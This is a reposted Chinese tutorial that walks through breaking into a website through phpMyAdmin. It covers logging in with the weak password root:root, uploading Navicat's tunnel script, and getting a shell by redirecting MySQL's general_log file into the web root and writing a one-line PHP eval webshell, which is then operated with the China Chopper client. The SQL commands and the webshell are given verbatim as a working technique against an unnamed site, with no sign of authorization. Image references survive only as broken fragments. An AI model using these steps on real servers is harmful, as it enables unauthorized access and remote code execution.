下面由phpmyadmin教程栏目给大家介绍Phpmyadmin的一次渗透测试 ,希望对需要的朋友有所帮助!
首先通过目录扫描对某站进行扫描,发现存在phpmyadmin,尝试弱口令root:root很幸运进去了
/2021/03/0141b991.png" alt="" width="529" height="264
尝试使用Navicate进行数据库连接返回禁止远程连接数据库:
/2021/03/de09148a.png" alt="" width="370" height="274
但是远程命令执行发现本地3306端口时开放的,于是尝试通过代理进行连接:
/2021/03/7c8dd74f.png" alt="
Navicat安装目录下上传ntunnel_mysql.php文件(数据库的代理脚本)到目标服务器任意web站点目录(后面getshell后上传的)
/2021/03/716c3f47.png" alt="" width="534" height="239
上传到D:/phpStudy/WWW目录进行访问http://XXX/ntunnel_mysql.php 测试成功
/2021/03/8c5711fa.png" alt="" width="776" height="294
进行测试连接:
(此时,在本地打开Navicat配置http连接,这里的通道地址就写你上面访问的那个url,说白点儿就是个代理端,勾上使用base64编码,防止waf从中作祟,然后主机名写localhost,账号密码写lnmp01本地数据库用户的账号即可,因为要连接lnmp01本地的mysql)
/2021/03/54a3540c.png" alt="" width="441" height="420
Phpmyadmin Get Shell:
利用日志文件
mysql 5.0版本以上会创建日志文件,修改日志的全局变量,也可以getshell。但是也要对生成的日志有可读可写的权限。
set global general_log = "ON"; #当开启general时,所执行的sql语句都会出现在WIN-30DFNC8L78A.log文件那么,如果修改general_log_file的值,那么所执行的sql语句就会对应生成进而getshell SET global general_log_file='D:/phpStudy/WWW/test1234.php'; #对应就会生成test1234.php文件 select '<?php eval($_POST[2019]);?>'; #将一句话木马写入test1234.php文件
/2021/03/067aa404.png" alt="" width="648" height="286
菜刀连接:
/2021/03/c31066ff.png" alt="
以上就是分享Phpmyadmin的一次渗透测试的详细内容,更多请关注北冥有鱼其它相关文章!
本文转载自【PHP中文网】,希望能给您带来帮助,苟日新、日日新、又日新,生命不息,学习不止。
